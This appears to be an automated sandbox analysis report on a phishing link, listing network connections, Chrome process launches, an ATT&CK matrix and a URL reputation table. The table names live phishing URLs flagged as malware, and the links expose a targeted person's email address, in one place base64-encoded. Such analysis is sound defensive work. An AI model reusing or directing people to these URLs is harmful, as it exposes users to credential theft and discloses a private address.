          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownHTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.5:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.5:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49766 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49765 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49771 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49772 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49822 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49823 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49838 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49837 version: TLS 1.2
          Source: classification engineClassification label: mal80.phis.win@20/105@54/21
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2520,i,3270245400796582298,11625835967902947532,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ=="
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2520,i,3270245400796582298,11625835967902947532,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting
          Valid AccountsWindows Management Instrumentation1
          Scripting
          1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Registry Run Keys / Startup Folder
          1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
          https://developers.google.com/recaptcha/docs/faq#localhost_support0%URL Reputationsafe
          https://support.google.com/recaptcha#62627360%URL Reputationsafe
          https://support.google.com/recaptcha/?hl=en#62238280%URL Reputationsafe
          https://support.google.com/recaptcha/#61759710%URL Reputationsafe
          https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.0%URL Reputationsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%URL Reputationsafe
          https://support.google.com/recaptcha0%URL Reputationsafe
          https://recaptcha.net0%URL Reputationsafe
          https://www.apache.org/licenses/0%URL Reputationsafe
          https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que0%URL Reputationsafe
          https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca0%URL Reputationsafe
          https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t70%Avira URL Cloudsafe
          https://rfwai.elixir85.com/12uyZYHBH78nzrKfwqr470%Avira URL Cloudsafe
          https://rfwai.elixir85.com/uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh2540%Avira URL Cloudsafe
          https://rfwai.elixir85.com/yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab1800%Avira URL Cloudsafe
          https://rfwai.elixir85.com/ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C671400%Avira URL Cloudsafe
          https://rfwai.elixir85.com/45JQQXGinJG902EgrDtnvQTvw650%Avira URL Cloudsafe
          https://ysh.logentr.com/nifpyfuwrptybwamhqjifvdpkdSUBupTOFEKFMKMMHWTBNFLLVDHGJXSUFNYTXJFVQHZQpqTKFJlwZCJgDwI7yzBldhljwwx40100%Avira URL Cloudmalware
          https://rfwai.elixir85.com/yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm5121280%Avira URL Cloudsafe
          https://rfwai.elixir85.com/favicon.ico0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp122090%Avira URL Cloudsafe
          https://cloud.google.com/contact0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/RfWAi/100%Avira URL Cloudmalware
          https://rfwai.elixir85.com/mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx901450%Avira URL Cloudsafe
          https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css0%Avira URL Cloudsafe
          https://github.com/fent)0%Avira URL Cloudsafe
          https://www.google.com/recaptcha/api.js0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/12C1tM2Y6lGcdYEVUZu67200%Avira URL Cloudsafe
          https://rfwai.elixir85.com/veVvvrbtHetJlBWJqFj8ZEAe7Nkuts2OfI7xSK2rw0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd2320%Avira URL Cloudsafe
          https://ipapi.co/8.46.123.33/json/0%Avira URL Cloudsafe
          https://www.google.com/recaptcha/api2/0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/90jodEH2Rir67QW4OuPst510%Avira URL Cloudsafe
          https://rfwai.elixir85.com/ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg561700%Avira URL Cloudsafe
          https://rfwai.elixir85.com/345f8FXSJyBv6seEmEdklOXxG5e6FIs891070%Avira URL Cloudsafe
          https://rfwai.elixir85.com/efO4CTDXl0E5HViNkg78iFXDw85H8kkQKZmn980%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js0%Avira URL Cloudsafe
          https://rfwai.elixir85.com/abjlZHFJHKoUOtpqyef300%Avira URL Cloudsafe
          https://rfwai.elixir85.com/89U0IUXkEak2DXQHKMqxZiF121VeznpNcbYfab720%Avira URL Cloudsafe
          https://RfWAi.elixir85.com/RfWAi/#X100%Avira URL Cloudmalware
          https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css0%Avira URL Cloudsafe
          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d927bb0859422d/1720033614003/48Eq3BNYqb_JyY10%Avira URL Cloudsafe
          https://rfwai.elixir85.com/RfWAi/?vXalysa.a@centurybizsolutions.com100%Avira URL Cloudmalware
          https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js0%Avira URL Cloudsafe
          https://httpbin.org/ip0%Avira URL Cloudsafe
          https://cloud.google.com/recaptcha-enterprise/billing-information0%Avira URL Cloudsafe
